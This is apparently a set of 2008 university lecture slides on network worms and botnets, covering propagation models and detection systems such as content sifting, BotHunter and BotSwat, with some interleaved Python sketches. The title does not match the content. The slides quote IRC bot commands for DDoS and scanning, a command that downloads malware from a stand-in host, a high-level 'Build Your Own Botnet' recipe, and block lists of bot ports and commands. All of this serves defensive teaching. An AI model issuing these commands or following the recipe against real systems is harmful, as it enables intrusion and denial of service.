Games and the Impossibility of Realizable Ideal Functionality

Spring 2008, CS 155
Network Worms and Bots
John Mitchell

Outline
  Worms
    Worm examples and propagation methods
    Detection methods
      Traffic patterns: EarlyBird
      Vulnerabilities: Generic Exploit Blocking
    Disabling worms
      Generate signatures for network or host-based filters
  Bots
    Structure and use of bots
    Recognizing bot propagation
    Recognizing bot operation
      Network-based methods
      Host-based methods

Worm
  A worm is self-replicating software designed to spread through the network
    Typically exploits security flaws in widely used services
    Can cause enormous damage
      Launch DDoS attacks, install bot networks
      Access sensitive information
      Cause confusion by corrupting the sensitive information
  Worm vs. virus vs. Trojan horse
    A virus is code embedded in a file or program
    Viruses and Trojan horses rely on human intervention
    Worms are self-contained and may spread autonomously

Cost of worm attacks
  Morris worm, 1988
    Infected approximately 6,000 machines

      10% of computers connected to the Internet
    Cost ~$10 million in downtime and cleanup
  Code Red worm, July 16, 2001
    Direct descendant of Morris worm
    Infected more than 500,000 servers
    Programmed to go into infinite sleep mode July 28
    Caused ~$2.6 billion in damages
  Love Bug worm: $8.75 billion
  Statistics: Computer Economics Inc., Carlsbad, California

Internet Worm (first major attack)
  Released November 1988
    Program spread through Digital, Sun workstations
    Exploited Unix security vulnerabilities
      VAX computers and SUN-3 workstations running versions 4.2 and 4.3 Berkeley UNIX code
  Consequences
    No immediate damage from program itself
    Replication and threat of damage
      Load on network, systems used in attack
      Many systems shut down to prevent further attack

Some historical worms of note

  Worm      Date   Distinction
  Morris    11/88  Used multiple vulnerabilities, propagate to "nearby" sys
  ADM       5/98   Random scanning of IP address space
  Ramen     1/01   Exploited three vulnerabilities
  Lion      3/01   Stealthy, rootkit worm
  Cheese    6/01   Vigilante worm that secured vulnerable systems
  Code Red  7/01   First significant Windows worm; completely memory resident
  Walk      8/01   Recompiled source code locally
  Nimda     9/01   Windows worm: client-to-server, c-to-c, s-to-s, ...
  Scalper   6/02   11 days after announcement of vulnerability; peer-to-peer network of compromised systems
  Slammer   1/03   Used a single UDP packet for explosive growth
  Kienzle and Elder

Increasing propagation speed
  Code Red, July 2001

    Affects Microsoft Index Server 2.0 and the Windows 2000 Indexing Service, on Windows NT 4.0 and Windows 2000 systems that run IIS 4.0 and 5.0 Web servers
    Exploits known buffer overflow in Idq.dll
    Vulnerable population (360,000 servers) infected in 14 hours
  SQL Slammer, January 2003
    Affects Microsoft SQL Server 2000
    Exploits known buffer overflow vulnerability
      Server Resolution service vulnerability reported June 2002
      Patch released in July 2002, Bulletin MS02-039
    Vulnerable population infected in less than 10 minutes

Code Red
  Initial version released July 13, 2001
    Sends its code as an HTTP request
    HTTP request exploits buffer overflow
    Malicious code is not stored in a file
      Placed in memory and then run
  When executed,
    Worm checks for the file C:\Notworm
      If file exists, the worm thread goes into infinite sleep state
    Creates new threads
      If the date is before the 20th of the month, the next 99 threads attempt to exploit more computers by targeting random IP addresses

Code Red of July 13 and July 19
  Initial release of July 13
    1st through 20th of each month: spread via random scan of 32-bit IP address space
    20th through end of each month: attack
      Flooding attack against 198.137.240.91 (www.whitehouse.gov)
    Failure to seed random number generator => linear growth
  Revision released July 19, 2001
    White House responds to threat of flooding attack by changing the address of www.whitehouse.gov
    Causes Code Red to die for date >= 20th of the month
    But: this time random number generator correctly seeded
  Slides: Vern Paxson

Measuring activity: network telescope
  Monitor cross-section of Internet address space, measure traffic
    "Backscatter" from DoS floods
    Attackers probing blindly
    Random scanning from worms

  LBNL's cross-section: 1/32,768 of Internet
  UCSD, UWisc's cross-section: 1/256

Spread of Code Red
  Network telescopes' estimate of # infected hosts: 360K (beware DHCP & NAT)
  Course of infection fits classic logistic
  Note: the larger the vulnerable population, the faster the worm spreads
  That night (the 20th), worm dies, except for hosts with inaccurate clocks!
  It just takes one of these to restart the worm on August 1st
  Slides: Vern Paxson

Code Red 2
  Released August 4, 2001
  Comment in code: "Code Red 2"
    But in fact completely different code base
  Payload: a root backdoor, resilient to reboots
  Bug: crashes NT, only works on Windows 2000
  Localized scanning: prefers nearby addresses
  Safety valve: programmed to die Oct 1, 2001

Striving for Greater Virulence: Nimda
  Released September 18, 2001
  Multi-mode spreading:
    attack IIS servers via infected clients
    email itself to address book as a virus
    copy itself across open network shares
    modifying Web pages on infected servers w/ client exploit
    scanning for Code Red II backdoors (!)
      worms form an ecosystem!
  Leaped across firewalls
  Slides: Vern Paxson

[Figure annotations: Code Red 2 kills off Code Red 1; CR 1 returns thanks to bad clocks; Nimda enters the ecosystem; Code Red 2 settles into weekly pattern; Code Red 2 dies off as programmed. Slides: Vern Paxson]

How do worms propagate?
  Scanning worms
    Worm chooses "random" address
  Coordinated scanning
    Different worm instances scan different addresses
  Flash worms
    Assemble tree of vulnerable hosts in advance, propagate along tree
      Not observed in the wild, yet
      Potential for 10^6 hosts in < 2 sec! [Staniford]
  Meta-server worm
    Ask server for hosts to infect (e.g., Google for "powered by phpbb")
  Topological worm
    Use information from infected hosts (web server logs, email address books, config files, SSH "known hosts")
  Contagion worm
    Propagate parasitically along with normally initiated communication

How fast are scanning worms?
  Model propagation as infectious epidemic
    Simplest version: homogeneous random contacts
  N: population size
  S(t): susceptible hosts at time t
  I(t): infected hosts at time t
  $\beta$: contact rate
  i(t): I(t)/N, s(t): S(t)/N

  $$\frac{dI}{dt} = \beta \frac{I S}{N}, \qquad \frac{dS}{dt} = -\beta \frac{I S}{N}$$

  $$\frac{di}{dt} = \beta\, i\,(1 - i), \qquad i(t) = \frac{e^{\beta (t - T)}}{1 + e^{\beta (t - T)}}$$

  courtesy Paxson, Staniford, Weaver

Shortcomings of simplified model
  Prediction is faster than observed propagation
  Possible reasons
    Model ignores infection time, network delays
    Ignores reduction in vulnerable hosts by patching
  Model supports unrealistic conclusions
    Example: when the Top-100 ISPs deploy containment strategies, they still cannot prevent a worm spreading at 100 probes/sec from affecting 18% of the Internet, no matter what the reaction time of the system towards containment

Analytical Active Worm Propagation Model [Chen et al., Infocom 2003]
  More detailed discrete time model
    Assume infection propagates in one time step
  Notation
    N: number of vulnerable machines
    h: "hitlist", number of infected hosts at start
    s: scanning rate, # of machines scanned per infection
    d: death rate, infections detected and eliminated
    p: patching rate, vulnerable machines become invulnerable
    At time i, $n_i$ are infected and $m_i$ are vulnerable
  Discrete time difference equation
    Guess random IP addr, so infection probability $(m_i - n_i)/2^{32}$
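As a rough illustration of the two propagation models above, the sketch below evaluates the closed-form logistic curve and iterates a discrete-time recurrence written in the AAWP notation. The difference equation itself is not reproduced in the slide text, so the form used here, $n_{i+1} = (1 - d - p)\,n_i + (m_i - n_i)\,\bigl(1 - (1 - 2^{-32})^{s n_i}\bigr)$ with $m_i = (1 - p)^i N$, is an assumption built from the listed notation. The function names are hypothetical.

```python
import math

ADDRESS_SPACE = 2 ** 32  # random scans draw from the 32-bit IP address space


def logistic_fraction(t, beta, T):
    """Infected fraction i(t) of the simple epidemic model; i(T) = 1/2."""
    x = beta * (t - T)
    if x >= 0:
        return 1.0 / (1.0 + math.exp(-x))
    e = math.exp(x)  # this branch avoids overflow for very negative x
    return e / (1.0 + e)


def aawp_step(n_i, i, N, s, d, p):
    """One time tick of the assumed recurrence: returns n_{i+1} from n_i."""
    m_i = N * (1.0 - p) ** i  # machines still vulnerable after i ticks of patching
    # Chance that a given address is hit by at least one of the s * n_i scans.
    hit = -math.expm1(s * n_i * math.log1p(-1.0 / ADDRESS_SPACE))
    newly_infected = max(m_i - n_i, 0.0) * hit
    # Infected count shrinks by d*n_i (detected) and p*n_i (patched).
    return n_i - (d + p) * n_i + newly_infected


def aawp_run(N, h, s, d, p, ticks):
    """Infected counts n_0 .. n_ticks, starting from a hitlist of size h."""
    counts = [float(h)]
    for i in range(ticks):
        counts.append(aawp_step(counts[-1], i, N, s, d, p))
    return counts


if __name__ == "__main__":
    # 1M vulnerable machines, 100 scans/sec and death rate 0.001/second are the
    # values quoted for the plots; hitlist size 1 and no patching are assumptions.
    curve = aawp_run(N=1_000_000, h=1, s=100, d=0.001, p=0.0, ticks=3600)
    for t in (0, 600, 1200, 3600):
        print(t, round(curve[t]))
```

Varying `h` and `p` in `aawp_run` is one way to explore the hitlist-size and patching-rate effects that the slides plot.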

    Number infected reduced by $p n_i + d n_i$

Effect of parameters on propagation
  1. Hitlist size
  2. Patching rate
  3. Time to complete infection
  (Plots are for 1M vulnerable machines, 100 scans/sec, death rate 0.001/second)
  Other models:
    Wang et al., Modeling Timing Parameters ..., WORM '04 (includes delay)
    Ganesh et al., The Effect of Network Topology ..., Infocom 2005 (topology)

Worm Detection and Defense
  Detect via honeyfarms: collections of honeypots fed by a network telescope
    Any outbound connection from honeyfarm = worm (at least, that's the theory)
    Distill signature from inbound/outbound traffic

    If telescope covers N addresses, expect detection when worm has infected 1/N of population
  Thwart via scan suppressors: network elements that block traffic from hosts that make failed connection attempts to too many other hosts
  5 minutes to several weeks to write a signature
  Several hours or more for testing

Need for automation
  Current threats can spread faster than defenses can react
  Manual capture/analyze/signature/rollout model too slow
  [Figure: Contagion Period and Signature Response Period plotted over time, 1990 to 2005, on a scale of months, days, hrs, mins, secs. Labels: Program Viruses, Macro Viruses, E-mail Worms, Network Worms, Flash Worms; Preautomation, Postautomation]

  Slide: Carey Nachenberg, Symantec

Signature inference
  Challenge
    need to automatically learn a content "signature" for each new worm, potentially in less than a second!
  Some proposed solutions
    Singh et al., Automated Worm Fingerprinting, OSDI '04
    Kim et al., Autograph: Toward Automated, Distributed Worm Signature Detection, USENIX Sec '04

Signature inference
  Monitor network and look for strings common to traffic with worm-like behavior
    Signatures can then be used for content filtering
  Slide: S Savage

Content sifting
  Assume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm (true today, not tomorrow...)
  Two consequences
    Content Prevalence: W will be more common in traffic than other bitstrings of the same length
    Address Dispersion: the set of packets containing W will address a disproportionate number of distinct sources and destinations
  Content sifting: find W's with high content prevalence and high address dispersion and drop that traffic
  Slide: S Savage

Observation: High-prevalence strings are rare
  [Figure: cumulative fraction of signatures (0.984 to 1) vs. number of repeats (1 to 100000)]
  Only 0.6% of the 40 byte substrings repeat more than 3 times in a minute
  (Stefan Savage, UCSD *)

The basic algorithm
  Detector in network, observing traffic among hosts A, B, C, D, E and cnn.com
  [Animation: state of the two tables in each successive frame]

  Frame  Prevalence Table  Address Dispersion Table
                           Sources      Destinations
  1      (empty)           (empty)      (empty)
  2      1                 1 (A)        1 (B)
  3      1                 1 (A)        1 (B)
         1                 1 (C)        1 (A)
  4      2                 2 (A,B)      2 (B,D)
         1                 1 (C)        1 (A)
  5      3                 3 (A,B,D)    3 (B,D,E)
         1                 1 (C)        1 (A)
  (Stefan Savage, UCSD *)

Challenges
  Computation
    To support a 1Gbps line rate we have 12us to process each packet, at 10Gbps 1.2us, at 40Gbps ...
      Dominated by memory references; state expensive
    Content sifting requires looking at every byte in a packet
  State
    On a fully-loaded 1Gbps link a naive implementation can easily consume 100MB/sec for table
    Computation/memory duality: on high-speed (ASIC) implementation, latency requirements may limit state to on-chip SRAM

Which substrings to index?
  Approach 1: Index all substrings
    Way too many substrings => too much computation => too much state
  Approach 2: Index whole packet
    Very fast but trivially evadable (e.g., Witty, Email Viruses)
  Approach 3: Index all contiguous substrings of a fixed length S
    Can capture all signatures of length S and larger
  [Figure: byte sequence A B C D E F G H I J K]
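The basic algorithm and Approach 3 above can be sketched, under simplifying assumptions, as a naive detector that indexes every fixed-length substring of each packet and keeps a prevalence count plus source and destination sets per substring. The class name, the thresholds, and the small substring length are hypothetical choices for illustration. This version stores literal substrings and full address sets, which is the state-hungry naive form rather than the optimized one.

```python
from collections import defaultdict

SUBSTRING_LEN = 8    # S; kept small here (the slides measure 40-byte substrings)
PREVALENCE_MIN = 3   # hypothetical thresholds, chosen only for this example
DISPERSION_MIN = 3


class ContentSifter:
    def __init__(self):
        self.prevalence = defaultdict(int)    # substring -> packets it appeared in
        self.sources = defaultdict(set)       # substring -> distinct source addresses
        self.destinations = defaultdict(set)  # substring -> distinct destination addresses

    def observe(self, src, dst, payload):
        """Record one packet; return substrings that now reach all thresholds."""
        # Every contiguous window of length S, counted once per packet.
        windows = {payload[i:i + SUBSTRING_LEN]
                   for i in range(len(payload) - SUBSTRING_LEN + 1)}
        flagged = set()
        for w in windows:
            self.prevalence[w] += 1
            self.sources[w].add(src)
            self.destinations[w].add(dst)
            if (self.prevalence[w] >= PREVALENCE_MIN
                    and len(self.sources[w]) >= DISPERSION_MIN
                    and len(self.destinations[w]) >= DISPERSION_MIN):
                flagged.add(w)
        return flagged


if __name__ == "__main__":
    # Replays the animation frames: the same content travels A->B, B->D, D->E,
    # while C->A carries unrelated content.
    sifter = ContentSifter()
    worm = b"GET /x?" + b"\x90" * 4 + b"EXPLOIT!"
    sifter.observe("A", "B", worm)
    sifter.observe("C", "A", b"GET /index.html HTTP/1.0")
    sifter.observe("B", "D", worm)
    print(sorted(sifter.observe("D", "E", worm)))
```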

  (Stefan Savage, UCSD *)

How to represent substrings?
  Store hash instead of literal to reduce state
  Incremental hash to reduce computation
  Rabin fingerprint is one such efficient incremental hash function [Rabin81, Manber94]
    One multiplication, addition and mask per byte
  [Figure: packet P1 = R A N D A B C D O M and packet P2 = R A B C D A N D O M, each labeled Fingerprint = 11000000]

How to subsample?
  Approach 1: sample packets
    If we choose 1 in N, detection will be slowed by N
  Approach 2: sample at particular byte offsets
    Susceptible to simple evasion attacks
    No guarantee that we will sample same substring in every packet
  Approach 3: sample based on the hash of the substring

Finding "heavy hitters" via Multistage Filters
  [Figure: Field Extraction feeds Hash 1, Hash 2 and Hash 3; each hash increments a counter in Stage 1, Stage 2 and Stage 3; one comparator per stage; ALERT if all counters above threshold]

Multistage filters in action
  [Figure: counters in Stage 1, Stage 2 and Stage 3 against the threshold. Grey = other hashes, yellow = rare hash, green = common hash]
  (Stefan Savage, UCSD *)
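A minimal sketch of the multistage filter idea described above: each stage hashes the key with a different hash function into its own counter array, and the key is reported only when its counter in every stage is above the threshold. The class name, the table sizes, and the use of salted BLAKE2b to get one hash per stage are assumptions made for illustration, not details taken from the slides.

```python
import hashlib


class MultistageFilter:
    def __init__(self, stages=3, counters_per_stage=1024, threshold=3):
        self.threshold = threshold
        self.size = counters_per_stage
        self.counters = [[0] * counters_per_stage for _ in range(stages)]

    def _index(self, stage, key):
        # A different salt per stage gives each stage its own hash function.
        digest = hashlib.blake2b(key, digest_size=8, salt=bytes([stage])).digest()
        return int.from_bytes(digest, "big") % self.size

    def add(self, key):
        """Increment one counter per stage; True if all are above threshold."""
        all_above = True
        for stage, row in enumerate(self.counters):
            idx = self._index(stage, key)
            row[idx] += 1
            if row[idx] <= self.threshold:
                all_above = False
        return all_above


if __name__ == "__main__":
    f = MultistageFilter()
    for _ in range(5):
        print(f.add(b"common-substring-hash"))
```

A rare key can share a counter with a common key in one stage, but it is unlikely to collide in every stage, which is why requiring all comparators to fire filters out most uncommon strings with little state.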

High address dispersion is rare too
  Naive implementation might maintain a list of sources (or destinations) for each string hash
  But dispersion only matters if it's over threshold
    Approximate counting may suffice
    Trades accuracy for state in data structure
  Scalable Bitmap Counters
    Similar to multi-resolution bitmaps [Estan03]
    Reduce memory by 5x for modest accuracy error
  (Stefan Savage, UCSD *)

Scalable Bitmap Counters
  [Figure: Hash(Source) sets a bit in a bitmap]
  Hash: based on Source (or Destination)
  Sample: keep only a sample of the bitmap
  Estimate: scale up sampled count
  Adapt: periodically increase scaling factor
  Error Factor = $2/(2^{\text{numBitmaps}} - 1)$
  With 3 32-bit bitmaps, error factor = $2/(2^3 - 1) = 2/7$, i.e. 28.5%

Content sifting summary
  Index fixed-length substrings using incremental hashes
  Subsample hashes as function of hash value
  Multi-stage filters to filter out uncommon strings
  Scalable bitmaps to tell if number of distinct addresses per hash crosses threshold
  This is fast enough to implement

Experience
  Quite good.
    Detected and automatically generated signatures for every known worm outbreak over eight months
    Can produce a precise signature for a new worm in a fraction of a second
    Software implementation keeps up with 200Mbps
  Known worms detected:
    Code Red, Nimda, WebDav, Slammer, Opaserv, ...
  Unknown worms (with no public signatures) detected:
    MsBlaster, Bagle, Sasser, Kibvu, ...

False Positives
  Common protocol headers
    Mainly HTTP and SMTP headers
    Distributed (P2P) system protocol headers
    Procedural whitelist
      Small number of popular protocols
  Non-worm epidemic activity
    SPAM
    BitTorrent
  Example payload (16 bytes per row):
    GNUTELLA.CONNECT
    /0.6..X-Max-TTL:
    .3..X-Dynamic-Qu
    erying:.0.1..X-V
    ersion:.4.0.4..X
    -Query-Routing:.
    0.1..User-Agent:
    .LimeWire/4.0.6.
    .Vendor-Message:
    .0.1..X-Ultrapee
    r-Query-Routing:

Generic Exploit Blocking
  Idea

    Write a network IPS signature to generically detect and block all future attacks on a vulnerability
    Different from writing a signature for a specific exploit!
  Step #1: Characterize the vulnerability "shape"
    Identify fields, services or protocol states that must be present in attack traffic to exploit the vulnerability
    Identify data footprint size required to exploit the vulnerability
    Identify locality of data footprint; will it be localized or spread across the flow?
  Step #2: Write a generic signature that can detect data that "mates" with the vulnerability shape
  Similar to Shield research from Microsoft
  Slide: Carey Nachenberg, Symantec

Generic Exploit Blocking Example #1

  Consider MS02-039 Vulnerability (SQL Buffer Overflow):
    Field/service/protocol
      UDP port 1434
      Packet type: 4
    Minimum data footprint
      Packet size > 60 bytes
    Data localization
      Limited to a single packet
  Pseudo-signature:
    if (packet.port() == 1434 &&
        packet[0] == 4 &&
        packet.size() > 60)
    {
        report_exploit(MS02-039);
    }
  Sample signature:
    BEGIN
    DESCRIPTION: MS02-039
    NAME: MS SQL Vuln
    TRANSIT-TYPE: UDP
    TRIGGER: ANY:ANY->ANY:1434
    OFFSET: 0, PACKET
    SIG-BEGIN
    "\x04
    "
    SIG-END
    END
  Slide: Carey Nachenberg, Symantec

Generic Exploit Blocking Example #2
  Consider MS03-026 Vulnerability (RPC Buffer Overflow):
    Field/service/protocol
      RPC request on TCP/UDP 135
      szName field in CoGetInstanceFromFile func.
    Minimum data footprint
      Arguments > 62 bytes
    Data localization
      Limited to 256 bytes from start of RPC bind command
  Pseudo-signature:
    if (port == 135 &&
        type == request &&
        func == CoGetInstanceFromFile &&
        parameters.length() > 62)
    {
        report_exploit(MS03-026);
    }
  Sample signature:
    BEGIN
    DESCRIPTION: MS03-026
    NAME: RPC Vulnerability
    TRANSIT-TYPE: TCP, UDP
    TRIGGER: ANY:ANY->ANY:135
    SIG-BEGIN
    "\x05\x00\x0B\x03\x10\x00\x00
    (about 50 more bytes...)
    \x00\x00.*\x05\x00
    "
    SIG-END
    END
  Slide: Carey Nachenberg, Symantec

Worm summary
  Worm attacks
    Many ways for worms to propagate

    Propagation speed is increasing
    Polymorphic worms, other barriers to detection
  Detect
    Traffic patterns: EarlyBird
    Watch attack: TaintCheck and Sting
    Look at vulnerabilities: Generic Exploit Blocking
  Disable
    Generate worm signatures and use in network or host-based filters

Botnet
  Collection of compromised hosts
    Spread like worms and viruses
    Once installed, respond to remote commands
  Platform for many attacks
    Spam forwarding (70% of all spam?)
    Click fraud
    Keystroke logging
    Distributed denial of service attacks
  Serious problem
    Top concern of banks, online merchants
    Vint Cerf: of hosts connected to Internet

What are botnets used for?
  [Table: capabilities (rows) by bot (columns: ago, DSNX, evil, G-SyS, sd, Spy); cell marks not shown]
  Capabilities: create port redirect, other proxy, download file from web, DNS resolution, UDP/ping floods, other DDoS floods, scan/spread, spam, visit URL
  Capabilities are exercised via remote commands.

Building a Bot Network
  [Figure: Attacker makes compromise attempts against four hosts: Win XP, FreeBSD, Mac OS X, Win XP]
  [Figure: the two Win XP hosts are compromised and the attacker installs bot software on them]

Step 2
  [Figure: each compromised Win XP host connects to jade.va.dal.net and joins the channel]
    /connect jade.va.us.dal.net
    /join #hacker

Step 3
  (12:59:27pm) -- A9-pcgbdv ([email protected]) has joined (#owned) Users : 1646
  (12:59:27pm) (@PhaTTy) .ddos.synflood 216.209.82.62
  (12:59:27pm) -- A6-bpxufrd ([email protected]) has joined (#owned) Users : 1647
  (12:59:27pm) -- A9-nzmpah ([email protected]) has left IRC (Connection reset by peer)
  (12:59:28pm) (@PhaTTy) .scan.enable DCOM
  (12:59:28pm) -- A9-tzrkeasv ([email protected]) has joined (#owned) Users : 1650

[Figure labels: Spam service, Rent-a-bot, Cash-out, Pump and dump, Botnet rental]

Underground commerce
  Market in access to bots
    Botherd: Collects and manages bots
    Access to proxies ("peas") sold to spammers, often with commercial-looking web interface
  Sample rates
    Non-exclusive access to botnet: 10 per machine
    Exclusive access: 25
    Payment via compromised account (e.g., PayPal) or cash to dropbox
  Identity theft
    Keystroke logging
    Complete identities available for $25 - $200+
      Rates depend on financial situation of compromised person
      Include all info from PC files, plus all websites of interest with passwords/account info used by PC owner
      At $200+, usually includes full credit report
  [Lloyd Taylor, Keynote Systems, SFBay InfraGard Board]

Sobig.a In Action
  Arrives as an email attachment
    Written in C++
    Encrypted with Telock to slow analysis
  User opens attachment, launching trojan
    Downloads file from a free Geocities account
    Contains list of URLs pointing to second stage
  Fetches second-stage trojan
    Arbitrary executable file; could be anything
    For Sobig.a, second-stage trojan is Lala

Stage 2: Lala
  Communication
    Lala notifies a cgi script on a compromised host
    Different versions of Lala have different sites and cgi scripts, perhaps indicating tracking by author
  Installation
    Lala installs a keylogger and password-protected Lithium remote access trojan
    Lala downloads Stage 3 trojan
      Wingate proxy (commercial software)
  Cleanup
    Lala removes the Sobig.a trojan

Stage 3: Wingate
  Wingate is a general-purpose port proxy server
    555/TCP   RTSP Service
    1180/TCP  SOCKS
    1182/TCP  WWW Proxy
    1184/TCP  POP3 Proxy
    608/TCP   Remote Control
    1181/TCP  Telnet Proxy
    1183/TCP  FTP Proxy
    1185/TCP  SMTP Server
  Final state of compromised machine
    Complete remote control by Lithium client with password "adm123"
    Complete logging of user's keystrokes
    Usable for spam relay, http redirects
    Wingate Gatekeeper client can connect to 608/TCP, can log/change everything

Build Your Own Botnet
  Pick a vector mechanism
    IRC Channels: DCC Filesends, Website Adverts to Exploit Sites
    Scan & Sploit: MSBlast
    Trojan: SoBig/BugBear/ActiveX Exploits
  Choose a Payload
    Backdoors: Agobot, SubSeven, DeepThroat
    Most include mechanisms for DDoS, self-spreading, download/exec arbitrary code, password stealers
  Do it
    Compromise an IRC server, or use your own zombied machines
    Configure payload to connect to selected server
    Load encryption keys and codes
    Release through appropriate compromised systems
    Sit back and wait, or start on your next botnet
  [Lloyd Taylor, Keynote Systems, SFBay InfraGard Board]

Bot detection methods
  Signature-based (most AV products)
  Rule-based
    Monitor outbound network connections (e.g., ZoneAlarm, BINDER)
    Block certain ports (25, 6667, ...)
  Hybrid: content-based filtering
    Match network packet contents to known command strings (keywords)
    E.g., Gaobot DDoS cmds: .ddos.httpflood
  Network traffic monitoring
    Wenke Lee, Phil Porras: BotHunter
      Correlate various NIDS alarms to identify bot infection sequence
    GA Tech: Recognize traffic patterns associated with DDNS-based rallying
    Stuart Staniford, FireEye
      Detect port scanning to identify suspicious traffic
      Emulate host with taint tracking to identify exploit

BotHunter: passive bot detection

What is botHunter?
  Snort-based sensor suite for malware event detection
    inbound scan detection
    remote to local exploit detection

    anomaly detection system for exploits over key TCP protocols
    Botnet specific egg download banners
    Victim-to-C&C-based communications exchanges, particularly for IRC bot protocols
  Event correlator
    combines information from sensors to recognize bots that infect and coordinate with your internal network assets
    Submits bot-detection profiles to the Cyber-TA repository infrastructure

Infection lifecycle: a behavioral-based approach
  [Figure: infection lifecycle with Type I and Type II transitions]
    E1: Inbound Scan (A-2-V)
    E2: Inbound Infection (A-2-V)
    E3: Egg Download (V-2-A)
    E4: C&C Comms (V-2-C)
    E5: Outbound Scan (V-2-*)
  Search for duplex communication sequences that are indicative of infection-coordination-infection lifecycle

Bot infection case study: Phatbot
  Phatbot infection lifecycle
  A: Attack, V: Victim, C: C&C Server
  E1: A.* -> V.{2745, 135, 1025, 445, 3127, 6129, 139, 5000} (Bagle, DCOM2, DCOM, NETBIOS, DOOM, DW, NETBIOS, UPNP; TCP connections w/out content transfers)
  E2: A.* -> V.135 (Windows DCE RPC exploit in payload)
  E3: V.* -> A.31373 (transfer a relatively large file via random A port specified by exploit)
  E4: V.* -> C.6668 (connect to an IRC server)
  E5: V.* -> V.{2745, 135, 1025, 445, 3127, 6129, 139, 5000} (V begins search for new infection targets, listens on 11759 for future egg downloads)
  Captured in a controlled VMware environment

BotHunter System Architecture
  Botnets: Architecture Overview
  [Figure labels: Span Port to Ethernet Device; Snort 2.6.0; bothunter.config; spp_scade.c|h; SLADE; SCADE; Signature Engine; botHunter Ruleset; e1: Inbound Malware Scans; e2: Payload Anomalies; e2: Exploits; e3: Egg Downloads; e4: C&C Traffic; e5: Outbound Scans; CTA Parser; Snort; bothunter.XML; CTA Anonymizer Plugin; botHunter Correlator (Java 1.4.2)]
  bot Infection Profile:
    Confidence Score
    Victim IP
    Attacker IP List (by confidence)
    Coordination Center IP (by confidence)
    Full Evidence Trail: Sigs, Scores, Ports
    Infection Time Range
  Snort +2.6.0, OS: Linux, MacOS, Win, FreeBSD, Solaris, Java

botHunter Signature Set
  Replace standard snort rules
    Five custom rulesets: e[1-5].rules
  Scope
    known worm/bot exploit general traffic signatures, shell/code/script exploits, update/download/registered rules, C&C command exchanges, outbound scans, malware exploits
  Rule sources
    Bleeding Edge malware rulesets
    Snort Community Rules, Snort Registered Free Set
    Cyber-TA custom bot-specific rules
  Current set: 237 rules, operating on SRI/CSL and GA-Tech networks, relatively low false positive rate

botHunter - Correlation Framework
  Bot-state correlation data structure
    Table columns: VictimIP, E1, E2, E3, E4, E5, Score
    Rows: valid internal Home_Net IP
    Columns: bot infection stages
    Entry: IP addresses that contributed alerts to E-column
    Score column: cumulative score per row
    Threshold: (row_score > threshold) => declare bot
    InitTime triggers: an event that initiates the pruning timer
    Pruning timer: seconds remaining until a row is reinitialized
  Characteristics of bot declarations
    states are triggered in any order, but pruning timer reinitializes row state once an InitTime trigger is activated
    external stimulus alone cannot trigger bot alert
    2 x internal bot behavior triggers bot alert
    When bot alert is declared, IP addresses are assigned responsibility based on raw contribution
  Defaults:
    E1 Inbound scan detected       weight = .25
    E2 Inbound exploit detected    weight = .25
    E3 Egg download detected       weight = .50
    E4 C&C channel detected        weight = .50
    E5 Outbound scan detected      weight = .50
    Threshold = 1.0
    Pruning interval = 120 seconds

Botnets network traffic patterns
  Unique characteristic: "rallying"
    Bots spread like worms and trojans
    Payloads may be common backdoors
    Centralized control of botnet is characteristic feature
  Georgia Tech idea: DNS
    Bots installed at network edge
    IP addresses may vary, use Dynamic DNS
    Bots talk to controller, make DDNS lookup
      Pattern of DDNS lookup is easy to spot for common botnets!
  David Dagon, Sanjeev Dwivedi, Robert Edmonds, Julian Grizzard, Wenke Lee, Richard Lipton, Merrick Furst; Cliff Zou (U Mass)

BotSwat
  Host-based bot detection
  Based on idea of remote control commands

What does remote control look like?
  http.execute
  Invoke system calls:
    connect, network send and recv, create file, write file, ...
  On arguments received over the network:
    IP to connect to, object to request, file name, ...

BotSwat premise
  We can distinguish the behavior of bots from that of innocuous processes via detecting "remote control"
  We can approximate "remote control" as "using data received over the network in a system call argument"
  [Figure: numbered steps 1 to 8 among the NIC, agobot and Windows XP. Command: http.execute www.badguy.com/malware.exe C:\WIN\bad.exe. Resulting calls: connect(..., www.badguy.com, ...), send(..., GET /malware.exe, ...), fcreate(..., C:\WIN\malware.exe, ...)]
  [Figure: BotSwat between SOURCES and SINKS; sinks shown: bind(), CreateProcessA(), NtCreateFile(), ...]

BotSwat architecture: overview
  Interposition mechanism (detours)
    Interposes on API calls
  Tainting module
    Instantiates and propagates taint
  User-input module
    Tracks local user input as received via KB or mouse ("clean" data); propagates cleanliness
  Behavior checking
    Monitors invocations of selected system calls
    Queries tainting and user-input modules
    Determines whether to flag invocation
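The interplay of the tainting, user-input and behavior-checking modules can be illustrated with a toy model. This is only a sketch of the premise (network-derived data reaching a monitored call argument), not BotSwat's implementation, which interposes on Windows API calls. The class and function names, the substring-based taint test, and the chosen gate names are all assumptions made for illustration.

```python
class TaintTracker:
    """Toy tainting module: an argument is tainted if it appears in network data."""

    def __init__(self, min_len=4):
        self.network_data = []   # buffers received over the network
        self.clean = set()       # values attributed to local user input
        self.min_len = min_len   # ignore very short strings to limit false matches

    def on_recv(self, data):
        self.network_data.append(data)

    def on_user_input(self, value):
        self.clean.add(value)

    def is_tainted(self, arg):
        if len(arg) < self.min_len or arg in self.clean:
            return False
        return any(arg in buf for buf in self.network_data)


# Hypothetical set of monitored calls ("gates") for this sketch.
GATES = {"connect", "send", "bind", "NtCreateFile", "CreateProcessA"}


def check_call(tracker, name, args):
    """Behavior check: return the tainted arguments of a gated call, if any."""
    if name not in GATES:
        return []
    return [a for a in args if tracker.is_tainted(a)]


if __name__ == "__main__":
    t = TaintTracker()
    t.on_recv("http.execute www.badguy.com/malware.exe C:\\WIN\\bad.exe")
    print(check_call(t, "connect", ["www.badguy.com"]))
    print(check_call(t, "connect", ["www.example.org"]))
```

Marking a value as user input before the call suppresses the flag, mirroring the "clean data" idea in the user-input module.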

  ~70k lines C++ and ~2200 intercepted fxns

Library-call level tainting
  Intercept calls made by process via a DLL to memory-copying functions
    If C library functions statically linked in (STAT), we won't see run-time calls to these functions
  Handling visibility limitations
    Taint a mem region on basis of its contents
      Keep track of data received over the network
    Taint propagation modes:
      Cause-and-Effect (C&E): conservative
      Correlative (CORR): liberal

User input tracking
  Goal: Identify actions initiated by local app user
  Challenge: data value associated with mouse input heavily application-defined; not exposed via API call or similar
  Solution: consider all data values referred to by app while it is handling mouse input event clean (an over-approximation)
    Figure out when app handling input event
  [Figure: handling of a mouse click]
    System creates message M (Target Window: W; Input Type: LMB click; Location: ...)
    System posts M to thread's queue (M1, M2, M3)
    App reads M from queue: GetMessage(...)
